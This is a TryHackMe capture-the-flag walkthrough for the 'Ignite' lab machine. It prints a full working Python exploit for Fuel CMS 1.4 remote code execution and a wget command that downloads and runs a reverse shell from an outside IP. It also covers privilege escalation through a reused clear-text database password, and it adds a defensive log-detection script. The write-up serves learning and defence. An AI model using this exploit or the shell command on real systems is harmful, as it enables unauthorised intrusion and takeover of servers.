TryHackMe – Ignite Walkthrough
Introduction
This was a simple Linux machine that required enumerating a web server and exploiting a remote code execution vulnerability in Fuel CMS to gain initial access, then reusing clear-text database credentials exposed in a configuration file to escalate privileges to root.
Enumeration
The first thing to do is to run a TCP Nmap scan against the 1000 most common ports, using the following flags:
- -sC to run default scripts
- -sV to enumerate application versions
The scan identified only port 80 as open, so the next step is to enumerate HTTP.
Enumerating HTTP
When navigating to the site through a browser, it seems to be using Fuel CMS version 1.4:
Using SearchSploit to look for known vulnerabilities in this version of Fuel CMS:
There appears to be a remote code execution vulnerability. Mirroring the exploit:
When looking at the exploit code, it appears that commands are passed in the “filter” parameter of the /fuel/pages/select endpoint:
# Python 2 exploit as mirrored from SearchSploit (raw_input and the print statement are Python 2 syntax)
import requests
import urllib

url = "http://127.0.0.1:8881"  # base URL of the target; must be changed to point at the Fuel CMS instance

def find_nth_overlapping(haystack, needle, n):
    # Return the offset of the n-th occurrence of needle in haystack (-1 if absent);
    # used below to cut the response where the page body starts repeating
    start = haystack.find(needle)
    while start >= 0 and n > 1:
        start = haystack.find(needle, start+1)
        n -= 1
    return start

while 1:
    xxxx = raw_input('cmd:')
    # The "filter" parameter carries URL-encoded PHP that calls system() with the entered command
    burp0_url = url+"/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27"+urllib.quote(xxxx)+"%27%29%2b%27"
    proxy = {"http":"http://127.0.0.1:8080"}  # routes the request through Burp Suite; not needed here
    r = requests.get(burp0_url, proxies=proxy)
    html = "<!DOCTYPE html>"
    htmlcharset = r.text.find(html)
    begin = r.text[0:20]
    dup = find_nth_overlapping(r.text,begin,2)
    print r.text[0:dup]  # the command output precedes the page HTML, so print everything up to the repeat
By default the exploit proxies its traffic through Burp Suite on 127.0.0.1:8080; since a proxy is not needed here, that line can be commented out. The “url” variable also needs to be changed to point at the Fuel CMS instance:
Upon executing the exploit, it prompts for a command, which is then URL-encoded and passed as part of the “filter” argument in the request:
As shown in the screenshot above, this has granted remote code execution, although an interactive shell should be obtained to exploit the machine further.
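From the defender's side, the request pattern described above is easy to spot in web server access logs: a request to /fuel/pages/select whose “filter” value, once URL-decoded, contains PHP function calls rather than a plain filter string. The following detector is an added example written for this walkthrough, not code from the original post or from Fuel CMS; the log lines are constructed samples in combined log format.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access log lines (not from the walkthrough); the first carries
# the exploit's encoded "filter" value with the command "id" appended.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Jan/2024:10:00:01 +0000] "GET /fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27id%27%29%2b%27 HTTP/1.1" 200 1234
10.0.0.6 - - [10/Jan/2024:10:00:02 +0000] "GET /fuel/pages/select/?filter=about HTTP/1.1" 200 512
10.0.0.7 - - [10/Jan/2024:10:00:03 +0000] "GET /index.php HTTP/1.1" 200 2048
"""

# Combined log format: client IP, timestamp, method, request target, status code.
REQ_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d+)'
)

# Fragments that indicate PHP code in the filter rather than a page name:
# pi(...) and print(...) used to smuggle an expression, shell-spawning built-ins,
# variable-function calls such as $a('...'), and quote-plus concatenation.
SUSPICIOUS = re.compile(
    r"(\bpi\s*\(|\bprint\s*\(|\bsystem\b|\bpassthru\b|\bshell_exec\b|\bexec\b|\$\w+\s*\(|'\s*\+)",
    re.IGNORECASE,
)

def decode_filter(target):
    """Return the fully URL-decoded 'filter' parameter of a /fuel/pages/select request, or None."""
    parts = urlsplit(target)
    if not parts.path.startswith("/fuel/pages/select"):
        return None
    params = parse_qs(parts.query, keep_blank_values=True)
    if "filter" not in params:
        return None
    value = params["filter"][0]
    # parse_qs decodes once; decode again while it still changes, to catch double encoding.
    for _ in range(3):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def find_suspicious(log_text):
    """Return (client_ip, decoded_filter) for each request whose filter looks like PHP code."""
    hits = []
    for line in log_text.splitlines():
        m = REQ_RE.match(line)
        if not m:
            continue
        value = decode_filter(m.group("target"))
        if value is not None and SUSPICIOUS.search(value):
            hits.append((m.group("ip"), value))
    return hits
```

Running find_suspicious over the samples flags only the first line, showing the decoded PHP that the encoded parameter hides from a casual log review.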
The first step is to generate a reverse shell binary using MSFvenom with the following flags:
- -p to specify the payload type, in this case, the Linux TCP reverse shell
- LHOST to specify the local IP address the shell should connect back to
- LPORT to specify the local port the shell should connect back to
- -f to specify the output format for the shell, in this case, ELF
Setting up a Python Simple HTTP Server to host the shell:
The next step is to set up a Netcat listener, which will catch the reverse shell when it is executed by the victim host, using the following flags:
- -l to listen for incoming connections
- -v for verbose output
- -n to skip the DNS lookup
- -p to specify the port to listen on
Upon executing the following command through the exploit used above, the reverse shell is downloaded and executed, granting access as the www-data user:
wget 10.4.36.186/shell -O /tmp/shell && chmod +x /tmp/shell && /tmp/shell
The following steps can be done to obtain an interactive shell:
- Running python -c 'import pty; pty.spawn("/bin/sh")' on the victim host
- Hitting CTRL+Z to background the process and return to the local host
- Running stty raw -echo on the local host
- Typing fg and hitting ENTER to return to the reverse shell
Privilege Escalation
After gaining initial access to the machine, a bit of research showed where Fuel CMS stores its database credentials:
The database credentials were found in clear text in the database.php file:
As it turns out, the same password was being used for the root user on the machine:
Root-level access to the box has now been obtained.
Conclusion
This was definitely a beginner-level machine, but still quite fun to complete and would be ideal for someone who is starting their penetration testing journey and wants to begin learning basic techniques.